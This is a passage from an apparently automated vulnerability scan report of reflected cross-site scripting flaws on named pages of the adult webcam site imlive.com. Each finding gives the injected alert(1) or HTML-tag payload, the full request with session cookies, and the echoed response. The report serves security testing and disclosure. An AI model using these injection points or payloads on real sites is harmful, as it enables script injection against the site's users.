ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:28 GMT Connection: close Content-Length: 195962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:39 GMT Connection: close Content-Length: 70611 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:25 GMT Connection: close Content-Length: 70405 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1"> ...[SNIP]...
2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:38 GMT Connection: close Content-Length: 22962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:15 GMT Connection: close Content-Length: 22814 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:07 GMT Connection: close Content-Length: 119630 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:50 GMT Connection: close Content-Length: 119446 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1"> ...[SNIP]...
2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:42 GMT Connection: close Content-Length: 33699 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:33 GMT Connection: close Content-Length: 33515 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1"> ...[SNIP]...
2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
